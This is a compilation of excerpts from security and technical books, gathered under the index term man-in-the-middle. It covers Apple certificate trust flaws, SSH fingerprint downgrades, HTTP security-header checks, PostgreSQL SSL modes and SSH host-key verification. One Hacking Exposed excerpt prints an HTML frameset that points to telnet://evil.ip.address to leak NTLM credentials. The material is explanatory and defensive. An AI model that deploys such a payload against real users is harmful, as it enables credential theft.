MITM: man-in-the-middle



Engineering Security by Peter Gutmann

active measures, algorithmic trading, Amazon Web Services, Asperger Syndrome, bank run, barriers to entry, bitcoin, Brian Krebs, business process, call centre, card file, cloud computing, cognitive bias, cognitive dissonance, combinatorial explosion, Credit Default Swap, crowdsourcing, cryptocurrency, Daniel Kahneman / Amos Tversky, Debian, domain-specific language, Donald Davies, Donald Knuth, double helix, en.wikipedia.org, endowment effect, fault tolerance, Firefox, fundamental attribution error, George Akerlof, glass ceiling, GnuPG, Google Chrome, iterative process, Jacob Appelbaum, Jane Jacobs, Jeff Bezos, John Conway, John Markoff, John von Neumann, Kickstarter, lake wobegon effect, Laplace demon, linear programming, litecoin, load shedding, MITM: man-in-the-middle, Network effects, Parkinson's law, pattern recognition, peer-to-peer, Pierre-Simon Laplace, place-making, post-materialism, QR code, race to the bottom, random walk, recommendation engine, RFID, risk tolerance, Robert Metcalfe, Ruby on Rails, Sapir-Whorf hypothesis, Satoshi Nakamoto, security theater, semantic web, Skype, slashdot, smart meter, social intelligence, speech recognition, statistical model, Steve Jobs, Steven Pinker, Stuxnet, telemarketer, text mining, the built environment, The Death and Life of Great American Cities, The Market for Lemons, the payments system, Therac-25, too big to fail, Turing complete, Turing machine, Turing test, web application, web of trust, x509 certificate, Y2K, zero day, Zimmermann PGP


Mind you, Apple didn’t just trust Verisign-issued certificates but any certificate that users dropped onto their devices, so it was possible to bypass the payment system in Apple’s app store by installing your own CA certificate on your iPhone, iPad, or Mac and having it “validate” purchases through you rather than through the real app store [239][240][241][242] (the fact that Apple took precautions against outsiders but not against their own users is an example of projection bias, covered in more detail in “Confirmation Bias and other Cognitive Biases” on page 145). More than a year later the same issue was still present in Apple’s iMessage system, which trusted any CA-issued certificate (rather than only ones designated for the iMessage servers), allowing man-in-the-middle (MITM) attacks on communications with the iMessage servers. Since iMessage sends the AppleID and password in the clear (over the potentially MITM’d link), a single MITM on an iMessage communication would give an attacker access to the user’s iCloud accounts, backups, and everything else connected to their Apple account [243]. These problems were made even worse by the fact that the CA root certificate posted on Apple’s web site was for “Apple Root Certificate Authority” [244] while the iPhone one is for “Apple Root CA”, making it impossible to verify the certificates issued with it even if someone did track the other root certificate down on Apple’s web site, because the certificates are identified as coming from a different CA (this has since been corrected after Apple were informed of the problem).

There are even automated attack tools around that enable this subversion of the fingerprint mechanism. The simplest attack, provided by a man-in-the-middle (MITM) tool called ssharpd [191], uses ARP redirection to grab an SSH connect attempt and then reports a different protocol version from the one that’s actually in use (it can get the protocol version from the information passed in the SSH handshake). Since SSHv1 and SSHv2 keys have different fingerprints, the victim doesn’t get the more serious key-changed warning but merely the relatively benign new-key warning. Since many users never check key fingerprints but simply assume that everything should be OK on the first connect, the attack succeeds and the ssharp MITM has access to the session contents [192].

    > ssh test@testbox
    The authenticity of host 'testbox (192.168.1.38)' can't be established.


pages: 224 words: 45,431

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, Dave Mound

en.wikipedia.org, Kickstarter, Minecraft, MITM: man-in-the-middle, web application

This check will print a warning if the header is not set or if the response does not explicitly match nosniff:

    # req is the requests response object fetched earlier in the recipe (Python 2 syntax)
    try:
        contenttype = req.headers['X-Content-Type-Options']
        if contenttype != 'nosniff':
            print 'X-Content-Type-Options not set properly'
    except:
        # a missing header raises KeyError on the headers lookup
        print 'X-Content-Type-Options not set'

The next header, Strict-Transport-Security, is used to force communication over an HTTPS channel, to prevent man-in-the-middle (MITM) attacks. The lack of this header means that the communication channel could be downgraded to HTTP by an MITM attack:

    try:
        hsts = req.headers['Strict-Transport-Security']
    except:
        print 'HSTS header not set, MITM attacks may be possible'

The final header, Content-Security-Policy, is used to restrict the types of resources that can load on the web page, for example, restricting where JavaScript can run:

    try:
        csp = req.headers['Content-Security-Policy']
        print 'Content-Security-Policy set:', csp
    except:
        print 'Content-Security-Policy missing'

The output from the recipe is shown in the following screenshot:

Brute forcing login through the Authorization header

Many websites use HTTP basic authentication to restrict access to content.


    = '1; mode=block':
            print 'X-XSS-Protection not set properly, XSS may be possible:', xssprotect
    except:
        print 'X-XSS-Protection not set, XSS may be possible'
    try:
        contenttype = req.headers['X-Content-Type-Options']
        if contenttype != 'nosniff':
            print 'X-Content-Type-Options not set properly:', contenttype
    except:
        print 'X-Content-Type-Options not set'
    try:
        hsts = req.headers['Strict-Transport-Security']
    except:
        print 'HSTS header not set, MITM attacks may be possible'
    try:
        csp = req.headers['Content-Security-Policy']
        print 'Content-Security-Policy set:', csp
    except:
        print 'Content-Security-Policy missing'
    print '----'

How it works…

This recipe is configured for testing many sites, so the first part reads in the URLs from the text file and prints out the current target:

    # requires 'import requests' at the top of the script (Python 2 syntax)
    urls = open("urls.txt", "r")
    for url in urls:
        url = url.strip()
        req = requests.get(url)
        print url, 'report:'

Each header is then tested inside a try/except block.


Linux Security Cookbook by Daniel J. Barrett, Richard E. Silverman, Robert G. Byrnes

Debian, GnuPG, MITM: man-in-the-middle, web of trust


This setup is fine for testing, but do not use these certificates for a production system. These keys are distributed with every Red Hat system: they are public knowledge. If you deploy a service using default, dummy keys, you are vulnerable to a man-in-the-middle (MITM) attack, in which the attacker impersonates your system using the well-known dummy private keys. Furthermore, the name in the certificate does not match your server's hostname, and the certificate is not issued by a recognized Certifying Authority; both of these conditions will be flagged as warnings by your mail client. [Recipe 4.4]

To preserve the server authentication and MITM resistance features of SSL, generate a new key for your mail server, and obtain an appropriate certificate binding the key to your server's name. [Recipe 4.7][Recipe 4.8]

You can control how imapd performs password validation by means of PAM.

[A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] daemons IMAP, within xinetd imapd [See imapd] inetd [See inetd] Kerberized Telnet daemon, enabling mail, receiving mail without running POP, enabling within xinetd or inetd sendmail, security risks with visibility of Snort, running as sshd [See sshd] starting/stopping via sudo tcpd using with inetd using with xinetd Telnet, disabling standard xinetd [See xinetd] dangling network connections, avoiding date command DATE environment variable datestamps, handling by logwatch Debian Linux, debsums tool debugging debug facility, system messages Kerberized authentication on Telnet Kerberos authentication on POP Kerberos for SSH PAM modules SSL connection problems from server-side dedicated server, protecting with firewall denial-of-service (DOS) attacks preventing Snort detection of vulnerability to using REJECT DENY absorbing incoming packets (ipchains) with no response pings, preventing REJECT vs.


Service Design Patterns: Fundamental Design Solutions for SOAP/WSDL and RESTful Web Services by Robert Daigneau

Amazon Web Services, business intelligence, business process, continuous integration, create, read, update, delete, en.wikipedia.org, fault tolerance, loose coupling, MITM: man-in-the-middle, MVC pattern, pull request, RFC: Request For Comment, Ruby on Rails, software as a service, web application

Lost-Update Problem—Occurs when two clients attempt to update the same resource at roughly the same time. Consider the case where client A and client B both retrieve data on customer C at the same time. Let’s say client A updates and saves this record, then client B does the same. If client A immediately reads the data on customer C again, it may appear as though their update was lost because they now see client B’s updates.

Man-in-the-Middle Attack (MITM)—Occurs when a third party intercepts communications between a client and service. In the case of web services, the malicious party co-opts the TCP connection between the client and the server. The end result is that the client has a connection to the middleman, which also has a connection to the target service. The middleman may silently eavesdrop on the conversation to acquire information, or inject commands to alter the flow of the conversation.

[Book index excerpt (L–M), run together from the scanned pages; the entry matching the search term reads: Man-in-the-Middle Attack (MITM), 286]

[Book index excerpt (M–N), run together from the scanned pages; the entry matching the search term reads: MITM (Man-in-the-Middle Attack), 286]


pages: 889 words: 433,897

The Best of 2600: A Hacker Odyssey by Emmanuel Goldstein

affirmative action, Apple II, call centre, don't be evil, Firefox, game design, Hacker Ethic, hiring and firing, information retrieval, John Markoff, late fees, license plate recognition, Mitch Kapor, MITM: man-in-the-middle, optical character recognition, packet switching, pirate software, place-making, profit motive, QWERTY keyboard, RFID, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Silicon Valley, Skype, spectrum auction, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Telecommunications Act of 1996, telemarketer, undersea cable, Y2K

And yes, I also set the “Allow automatic table additions” option back to off. Anyhow, I hope this proves interesting for some of you wireless hackers out there.

An Old Trick for a New Dog—WiFi and MITM (Winter, 2004-2005)
by uberpenguin

If you are reading this magazine, it is probably safe to assume you are familiar with the concept of a man-in-the-middle attack (which from here will be referred to as MITM for brevity) as it pertains to networking resources. In this article I hope to point out how this old and well known concept can be applied to an 802.11 WiFi network. I will use a case study of a fairly large wireless network I have access to in order to illustrate a possible scenario of a WiFi MITM attack.

The Network

First, let’s establish that gaining access to the network is not going to be discussed here. In my case study I already had legitimate access to the network and formulated my scenario from the point of view of one of the numerous persons who also have access to this wireless network.

[Book index excerpt (L–P), run together from the scanned pages with their running headers; the entries matching the search term read: man-in-the-middle attacks (MITMs), WiFi, 744–746; MITMs (man-in-the-middle attacks), WiFi, 744–746]


pages: 260 words: 40,943

Hacking Exposed: Network Security Secrets and Solutions by Stuart McClure, Joel Scambray, George Kurtz

AltaVista, bash_history, Larry Wall, MITM: man-in-the-middle, peer-to-peer, remote working, web application

It’s also pertinent to mention here that the LAN Manager Authentication Level setting in Security Policy can make it much more difficult to extract user credentials from NTLM challenge-response exchanges, as discussed in Chapter 5. Setting it to Send NTLMv2 Response Only or higher can greatly mitigate the risk from LM/NTLM eavesdropping attacks. (This assumes the continued restricted availability of programs that will extract hashes from NTLMv2 challenge-response traffic.) Rogue server and man-in-the-middle (MITM) attacks against NTLMv2 authentication are still feasible, assuming that the rogue/MITM server can negotiate the NTLMv2 dialect with the server on behalf of the client.

IRC HACKING

Internet Relay Chat (IRC) remains one of the more popular applications on the Internet, driven not only by the instant gratification of real-time communications, but also by the ability to instantaneously exchange files using most modern IRC client software.

This also allows an attacker to craft an HTML email message that forces an outbound authentication over any port:

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
</html>

Normally, this wouldn’t be such a big deal, except that on Win 2000, the built-in telnet client is set to use NTLM authentication by default. Thus, in response to the preceding HTML, a Win 2000 system will merrily attempt to log on to evil.ip.address using the standard NTLM challenge-response mechanism. This mechanism, as we saw in Chapter 5, can be vulnerable to eavesdropping and man-in-the-middle (MITM) attacks that reveal the victim’s username and password. This attack affects a multitude of HTML parsers and does not rely on any form of Active Scripting, JavaScript or otherwise. Thus, no IE configuration can prevent this behavior. Credit goes to DilDog of Back Orifice fame, who posted this exploit to Bugtraq.

Countermeasures for Telnet:// Attacks

Network security best practices dictate that outbound NTLM authentication traffic be blocked at the perimeter firewall.


pages: 360 words: 96,275

PostgreSQL 9 Admin Cookbook: Over 80 Recipes to Help You Run an Efficient PostgreSQL 9. 0 Database by Simon Riggs, Hannu Krosing

business intelligence, business process, database schema, Debian, en.wikipedia.org, full text search, GnuPG, MITM: man-in-the-middle, Skype

I want to be sure that I connect to a server that I trust.

SSL mode | Eavesdropping protection | MITM protection | Statement
verify-full | Yes | Yes | I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server I trust, and that it's the one I specify.

The MITM in the preceding table means Man-In-The-Middle attack, that is, someone posing as your server, but actually just observing and forwarding the traffic.

Checking server authenticity

The last two SSL modes allow you to be reasonably sure that you are actually talking to your server, by checking the SSL certificate presented by the server.

See also

To understand more about SSL in general, and the OpenSSL library used by PostgreSQL in particular, visit http://www.openssl.org, or get a good book about SSL. There was also a nice presentation named "Encrypted PostgreSQL" explaining these issues at pgcon2009. The slides are available at the following website: http://www.pgcon.org/2009/schedule/events/120.en.html

Encrypting sensitive data

This recipe shows how to encrypt data using the pgcrypto package.

The following commands generate a self-signed certificate for your server:

    openssl genrsa 1024 > server.key
    openssl req -new -x509 -key server.key -out server.crt

(1024-bit RSA keys are now considered too short; use 2048 bits or more.) Read more on X.509 keys and certificates in OpenSSL's HOWTO pages at the following website: http://www.openssl.org/docs/HOWTO/

Setting up a client to use SSL: Client behavior is controlled by an environment variable, PGSSLMODE, that can have the following values, as defined in the official PostgreSQL documents:

SSL mode    | Eavesdropping protection | MITM protection      | Statement
disable     | No                       | No                   | I don't care about security, and I don't want to pay the overhead of encryption.
allow       | Maybe                    | No                   | I don't care about security, but I will pay the overhead of encryption if the server insists on it.
prefer      | Maybe                    | No                   | I don't care about encryption, but I wish to pay the overhead of encryption if the server supports it.
require     | Yes                      | No                   | I want my data to be encrypted, and I accept the overhead. I trust that the network will make sure I always connect to the server that I want.
verify-ca   | Yes                      | Depends on CA policy | I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server that I trust.
verify-full | Yes                      | Yes                  | I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server I trust, and that it's the one I specify.
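The difference between the last two rows is the whole MITM story, so here is an added example (not code from the PostgreSQL 9 Admin Cookbook) that models what a client in each PGSSLMODE checks. The certificates are written in the dict form Python's ssl.SSLSocket.getpeercert() returns; the CA name, host names and both certificates are constructed for the example, and "chain validation" is reduced to an issuer lookup.

```python
"""Added example, not from the PostgreSQL 9 Admin Cookbook: what libpq's
verify-ca and verify-full modes check, modelled on server certificates in
the dict form Python's ssl.SSLSocket.getpeercert() returns. The CA name,
host names and both certificates are constructed for the example."""

# Issuers the client trusts, i.e. what would sit in ~/.postgresql/root.crt.
TRUSTED_ISSUERS = {((("commonName", "Example Corp Database CA"),),)}

# The database server we intend to reach (constructed).
REAL_SERVER_CERT = {
    "issuer": ((("commonName", "Example Corp Database CA"),),),
    "subject": ((("commonName", "db1.example.com"),),),
    "subjectAltName": (("DNS", "db1.example.com"), ("DNS", "db.example.com")),
}

# Another host holding a perfectly valid certificate from the SAME CA. A man
# in the middle presenting it satisfies verify-ca but not verify-full.
OTHER_HOST_CERT = {
    "issuer": ((("commonName", "Example Corp Database CA"),),),
    "subject": ((("commonName", "evil.example.com"),),),
    "subjectAltName": (("DNS", "evil.example.com"),),
}


def issuer_trusted(cert):
    """Stand-in for chain validation: does the cert chain to a trusted CA?"""
    return cert["issuer"] in TRUSTED_ISSUERS


def _dns_match(pattern, hostname):
    """Exact match, or a wildcard that covers exactly one leftmost label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern == hostname:
        return True
    if pattern.startswith("*.") and "*" not in pattern[2:]:
        labels = hostname.split(".")
        return ".".join(labels[1:]) == pattern[2:]
    return False


def hostname_matches(cert, hostname):
    """What verify-full adds: the name we asked for must appear in the cert.
    DNS SANs take precedence; the subject CN is only a fallback."""
    sans = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if sans:
        return any(_dns_match(s, hostname) for s in sans)
    cns = [v for rdn in cert["subject"] for k, v in rdn if k == "commonName"]
    return any(_dns_match(cn, hostname) for cn in cns)


def accept_server(sslmode, cert, hostname):
    """True if a client in this PGSSLMODE accepts the presented certificate."""
    if sslmode in ("disable", "allow", "prefer", "require"):
        return True  # encryption at most; no certificate checking at all
    if sslmode == "verify-ca":
        return issuer_trusted(cert)
    if sslmode == "verify-full":
        return issuer_trusted(cert) and hostname_matches(cert, hostname)
    raise ValueError("unknown sslmode: " + sslmode)
```

With require, whoever answers the connection is accepted as long as they speak TLS; with verify-ca, any certificate from the trusted CA is accepted, including one issued to a different host; only verify-full ties the certificate to the host name you typed.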


pages: 448 words: 117,325

Click Here to Kill Everybody: Security and Survival in a Hyper-Connected World by Bruce Schneier

23andMe, 3D printing, autonomous vehicles, barriers to entry, bitcoin, blockchain, Brian Krebs, business process, cloud computing, cognitive bias, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, cuban missile crisis, Daniel Kahneman / Amos Tversky, David Heinemeier Hansson, Donald Trump, drone strike, Edward Snowden, Elon Musk, fault tolerance, Firefox, Flash crash, George Akerlof, industrial robot, information asymmetry, Internet of things, invention of radio, job automation, job satisfaction, John Markoff, Kevin Kelly, license plate recognition, loose coupling, market design, medical malpractice, Minecraft, MITM: man-in-the-middle, move fast and break things, move fast and break things, national security letter, Network effects, pattern recognition, profit maximization, Ralph Nader, RAND corporation, ransomware, Rodney Brooks, Ross Ulbricht, security theater, self-driving car, Shoshana Zuboff, Silicon Valley, smart cities, smart transportation, Snapchat, Stanislav Petrov, Stephen Hawking, Stuxnet, The Market for Lemons, too big to fail, Uber for X, Unsafe at Any Speed, uranium enrichment, Valery Gerasimov, web application, WikiLeaks, zero day

How to enable it and why you should,” CSO, https://www.csoonline.com/article/3239144/password-security/what-is-two-factor-authentication-2fa-how-to-enable-it-and-why-you-should.html.
47 This, of course, isn’t perfect, either: Andy Greenberg (26 Jun 2016), “So hey you should stop using texts for two-factor authentication,” Wired, https://www.wired.com/2016/06/hey-stop-using-texts-two-factor-authentication.
47 Sprint, T-Mobile, Verizon, and AT&T: Steve Dent (8 Sep 2017), “U.S. carriers partner on a better mobile authentication system,” Engadget, https://www.engadget.com/2017/09/08/mobile-authentication-taskforce-att-verizon-tmobile-sprint.
47 Among other security protections: Dario Salice (17 Oct 2017), “Google’s strongest security, for those who need it most,” Keyword, https://www.blog.google/topics/safety-security/googles-strongest-security-those-who-need-it-most.
47 Sticky-note passwords regularly show up: Here’s one example from 2018: Kif Leswing (16 Jan 2018), “A password for the Hawaii emergency agency was hiding in a public photo, written on a Post-it note,” Business Insider, http://www.businessinsider.com/hawaii-emergency-agency-password-discovered-in-photo-sparks-security-criticism-2018-1.
48 Your smartphone has evolved into: Gary Robbins (23 Apr 2017), “The Internet of Things lets you control the world with a smartphone,” San Diego Union Tribune, http://www.sandiegouniontribune.com/sd-me-connected-home-20170423-story.html.
48 A hacker can convince a cell provider: Steven Melendez (18 Jul 2017), “How to steal a phone number and everything linked to it,” Fast Company, https://www.fastcompany.com/40432975/how-to-steal-a-phone-number-and-everything-linked-to-it.
48 They’ll reset bank accounts: Alex Perekalin (19 May 2017), “Why two-factor authentication is not enough,” Kaspersky Daily, https://www.kaspersky.com/blog/ss7-attack-intercepts-sms/16877.
Nathaniel Popper (21 Aug 2017), “Identity thieves hijack cellphone accounts to go after virtual currency,” New York Times, https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html.
49 This is called a man-in-the-middle attack: Rapid7 (9 Aug 2017), “Man-in-the-middle (MITM) attacks,” Rapid7 Fundamentals, https://www.rapid7.com/fundamentals/man-in-the-middle-attacks.
49 A credit card issuer might flag: Gartner (accessed 24 Apr 2018), “Reviews for online fraud detection,” https://www.gartner.com/reviews/market/Online Fraud DetectionSystems.
50 This was one of the techniques: David Kushner (26 Feb 2013), “The real story of Stuxnet,” IEEE Spectrum, https://spectrum.ieee.org/telecom/security/the-real-story-of-stuxnet.
50 For years, though, hackers have been: Dan Goodin (3 Nov 2017), “Stuxnet-style code signing is more widespread than anyone thought,” Ars Technica, https://arstechnica.com/information-technology/2017/11/evasive-code-signed-malware-flourished-before-stuxnet-and-still-does.

Sharon Goldberg (22 Jun 2017), “Surveillance without borders: The ‘traffic shaping’ loophole and why it matters,” Century Foundation, https://tcf.org/content/report/surveillance-without-borders-the-traffic-shaping-loophole-and-why-it-matters.
22 In 2013, one company reported: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking.
22 In 2014, the Turkish government: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking.
22 In 2017, traffic to and from: Dan Goodin (13 Dec 2017), “‘Suspicious’ event routes traffic for big-name sites through Russia,” Ars Technica, https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia.
22 a 2008 talk at the DefCon hackers conference: Dan Goodin (27 Aug 2008), “Hijacking huge chunks of the internet: A new How To,” Register, https://www.theregister.co.uk/2008/08/27/bgp_exploit_revealed.
23 “It’s not that we didn’t think about security”: Craig Timberg (30 May 2015), “A flaw in the design,” Washington Post, http://www.washingtonpost.com/sf/business/2015/05/30/net-of-insecurity-part-1.
23 “It is highly desirable that Internet carriers”: Brian E.

AUTHENTICATION IS GETTING HARDER, AND CREDENTIAL STEALING IS GETTING EASIER In 2016, Rob Joyce, then the head of the NSA’s since-renamed Tailored Access Operations (TAO) group—basically, the country’s chief hacker—gave a rare public talk. In a nutshell, he said that zero-day vulnerabilities are overrated, and credential stealing is how he gets into networks. He’s right. As bad as software vulnerabilities are, the most common way hackers break into networks is by abusing the authentication process. They steal passwords, set up man-in-the-middle attacks to piggyback on legitimate log-ins, or masquerade as authorized users. Credential stealing doesn’t require finding a zero-day or an unpatched vulnerability, plus there’s less chance of discovery, and it gives the attacker more flexibility in technique. This isn’t just true for the NSA; it’s true for all attackers. It’s how the Chinese hackers breached the Office of Personnel Management in 2015.


pages: 492 words: 118,882

The Blockchain Alternative: Rethinking Macroeconomic Policy and Economic Theory by Kariappa Bheemaiah

accounting loophole / creative accounting, Ada Lovelace, Airbnb, algorithmic trading, asset allocation, autonomous vehicles, balance sheet recession, bank run, banks create money, Basel III, basic income, Ben Bernanke: helicopter money, bitcoin, blockchain, Bretton Woods, business cycle, business process, call centre, capital controls, Capital in the Twenty-First Century by Thomas Piketty, cashless society, cellular automata, central bank independence, Claude Shannon: information theory, cloud computing, cognitive dissonance, collateralized debt obligation, commoditize, complexity theory, constrained optimization, corporate governance, creative destruction, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, crowdsourcing, cryptocurrency, David Graeber, deskilling, Diane Coyle, discrete time, disruptive innovation, distributed ledger, diversification, double entry bookkeeping, Ethereum, ethereum blockchain, fiat currency, financial innovation, financial intermediation, Flash crash, floating exchange rates, Fractional reserve banking, full employment, George Akerlof, illegal immigration, income inequality, income per capita, inflation targeting, information asymmetry, interest rate derivative, inventory management, invisible hand, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Joseph Schumpeter, Kenneth Arrow, Kenneth Rogoff, Kevin Kelly, knowledge economy, large denomination, liquidity trap, London Whale, low skilled workers, M-Pesa, Marc Andreessen, market bubble, market fundamentalism, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, money market fund, money: store of value / unit of account / medium of exchange, mortgage debt, natural language processing, Network effects, new economy, Nikolai Kondratiev, offshore financial centre, packet switching, Pareto efficiency, pattern recognition, peer-to-peer lending, Ponzi scheme, precariat, pre–internet, price mechanism, 
price stability, private sector deleveraging, profit maximization, QR code, quantitative easing, quantitative trading / quantitative finance, Ray Kurzweil, Real Time Gross Settlement, rent control, rent-seeking, Satoshi Nakamoto, Satyajit Das, savings glut, seigniorage, Silicon Valley, Skype, smart contracts, software as a service, software is eating the world, speech recognition, statistical model, Stephen Hawking, supply-chain management, technology bubble, The Chicago School, The Future of Employment, The Great Moderation, the market place, The Nature of the Firm, the payments system, the scientific method, The Wealth of Nations by Adam Smith, Thomas Kuhn: the structure of scientific revolutions, too big to fail, trade liberalization, transaction costs, Turing machine, Turing test, universal basic income, Von Neumann architecture, Washington Consensus

The system uses cryptographic signatures in place of server-side password storage, thus solving a common security problem [30] for IT administrators (Cawrey, 2014). BitAuth uses Bitcoin’s technology to create a public-private key pair using secp256k1. By providing the user with a system identification number (SIN) that is a hash of the public key, it allows for password-less authentication across web services. It uses signing to prevent man-in-the-middle (MITM) attacks, and a nonce to prevent replay attacks (Raval, 2016). The private key is never revealed to the server and can be stored safely and securely. Identity is decentralized, so instead of having to trust a third party to store identity, a user can store it themselves. The OpenID protocol, developed by the OpenID Foundation, is also pioneering this concept. OpenID is a decentralized identity protocol that uses existing web protocols like HTTP, SSL, and URI.



pages: 305 words: 93,091

The Art of Invisibility: The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data by Kevin Mitnick, Mikko Hypponen, Robert Vamosi

4chan, big-box store, bitcoin, blockchain, connected car, crowdsourcing, Edward Snowden, en.wikipedia.org, Firefox, Google Chrome, Google Earth, Internet of things, Kickstarter, license plate recognition, Mark Zuckerberg, MITM: man-in-the-middle, pattern recognition, ransomware, Ross Ulbricht, self-driving car, Silicon Valley, Skype, Snapchat, speech recognition, Tesla Model S, web application, WikiLeaks, zero day, Zimmermann PGP

Girls send, on average, about 3,952 text messages per month, and boys send closer to 2,815 text messages per month, according to the study.12 The good news is that today all the popular messaging apps provide some form of encryption when sending and receiving your texts—that is, they protect what’s called “data in motion.” The bad news is that not all the encryption being used is strong. In 2014, researcher Paul Jauregui of the security firm Praetorian found that it was possible to circumvent the encryption used by WhatsApp and engage in a man-in-the-middle (MitM) attack, in which the attacker intercepts messages between the victim and his recipient and is able to see every message. “This is the kind of stuff the NSA would love,” Jauregui observed.13 As of this writing, the encryption used in WhatsApp has been updated and uses end-to-end encryption on both iOS and Android devices. And the parent company for WhatsApp, Facebook, has added encryption to its 900 million Messenger users, although it is an opt-in, meaning you have to configure “Secret Conversations” to work.14 The worse news is what happens to data that’s archived, or “data at rest.”

Because I’m sitting in the middle of the interaction between the victim and the website, I can inject JavaScript and cause fake Adobe updates to pop up on his or her screen, which, if installed will infect the victim’s computer with malware. The purpose is usually to trick you into installing the fake update to gain control of your computer. When the guy at the corner table is influencing the Internet traffic, that’s called a man-in-the-middle attack. The attacker is proxying your packets through to the real site, but intercepting or injecting data along the way. Knowing that you could unintentionally connect to a shady Wi-Fi access point, how can you prevent it? On a laptop the device will go through the process of searching for a preferred wireless network and then connect to it. But some laptops and mobile devices automatically choose what network to join.

If I can get on your home network, I can eavesdrop on whatever conversation you’re having in your home while the TV is turned on. The argument in favor of keeping the TV in listening mode is that the device needs to hear any additional commands you might give it, such as “Volume up,” “Change the channel,” and “Mute the sound.” That might be okay, except the captured voice commands go up to a satellite before they come back down again. And because the entire string of data is not encrypted, I can carry out a man-in-the-middle attack on your TV, inserting my own commands to change your channel, pump up your volume, or simply turn off the TV whenever I want. Let’s think about that for a second. That means if you’re in a room with a voice-activated TV, in the middle of a conversation with someone, and you decide to turn on the TV, the stream of conversation that follows may be recorded by your digital TV. Moreover, that recorded conversation about the upcoming bake sale at the elementary school may be streamed back to a server somewhere far from your living room.


Multitool Linux: Practical Uses for Open Source Software by Michael Schwarz, Jeremy Anderson, Peter Curtis

business process, Debian, defense in depth, GnuPG, index card, indoor plumbing, Larry Wall, MITM: man-in-the-middle, optical character recognition, publish or perish, RFC: Request For Comment, Richard Stallman, SETI@home, slashdot, web application

RSA key fingerprint is 58:f1:d0:f7:db:86:81:76:60:e2:7c:dd:d9:ff:f1:4e. Are you sure you want to continue connecting (yes/no)? Danger, Will Robinson! Danger! Harken back, if you will, to Chapter 10. Once again, you are dealing with cryptographic keys and trust. Only you can decide whether to trust the host key. Once you have done so, it is trusted for all time. Key discovery by connection is very risky. It is easily foiled by a "Man in the Middle" attack (MITM). You could be connecting to a spoofed host, where they are feeding you a key of their own creation. They will then make a connection of their own to the real host. Just as with GPG, I prefer to ship host keys in person. In this case, however, let's throw caution to the wind and proceed: Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'alienmystery.planetmercury.net,216.17.15.13' (RSA) to the list of known hosts.
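The fingerprint in that prompt is all you have to go on, so it is worth knowing exactly how it is derived. The following is an added example (not code from Multitool Linux) that computes the fingerprints ssh prints for a host key, so a key offered on first connection can be compared with one obtained out of band, and that builds the known_hosts line you would pre-seed instead of answering "yes". The RSA key is built from constructed numbers (not a real modulus); the host name and address are taken from the prompt above as placeholders.

```python
"""Added example, not from Multitool Linux: compute the fingerprints ssh
prints for a host key so that a key offered during a first connection can be
compared with one obtained out of band. The RSA key below is built from
constructed numbers (not a real modulus); host names are placeholders."""
import base64
import hashlib
import struct


def ssh_string(b):
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def ssh_mpint(n):
    """SSH mpint: big-endian bytes with a leading zero if the top bit is set."""
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_rsa_pubkey_line(e, n, comment="constructed@example"):
    """Build an OpenSSH 'ssh-rsa <base64 blob> <comment>' line from e and n."""
    blob = ssh_string(b"ssh-rsa") + ssh_mpint(e) + ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def parse_pubkey_line(line):
    """Return (key type, raw blob) from a 'type base64 [comment]' line and
    check that the type inside the blob agrees with the declared one."""
    key_type, b64 = line.split()[:2]
    blob = base64.b64decode(b64)
    (tlen,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + tlen] != key_type.encode():
        raise ValueError("key type in blob does not match the declared type")
    return key_type, blob


def fingerprint_md5(blob):
    """Legacy colon-separated MD5 form, as in the prompt quoted above."""
    return ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def fingerprint_sha256(blob):
    """Form printed by current OpenSSH: SHA256:<unpadded base64>."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def host_key_trusted(key_line, out_of_band_fingerprints):
    """Accept the offered key only if a fingerprint obtained out of band matches it."""
    _, blob = parse_pubkey_line(key_line)
    md5, sha = fingerprint_md5(blob), fingerprint_sha256(blob)
    for f in out_of_band_fingerprints:
        f = f.strip()
        if f.lower().removeprefix("md5:") == md5 or f == sha:
            return True
    return False


def known_hosts_entry(hostname, ip, key_line):
    """Pre-seed known_hosts with a verified key instead of trusting the first connection."""
    key_type, b64 = key_line.split()[:2]
    return f"{hostname},{ip} {key_type} {b64}"
```

Run `ssh-keygen -lf` against the key file on the server itself (or have the administrator read the fingerprint out to you) and feed that value to host_key_trusted; if it does not match, the "yes" at the prompt is exactly what the man in the middle is waiting for.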


Applied Cryptography: Protocols, Algorithms, and Source Code in C by Bruce Schneier

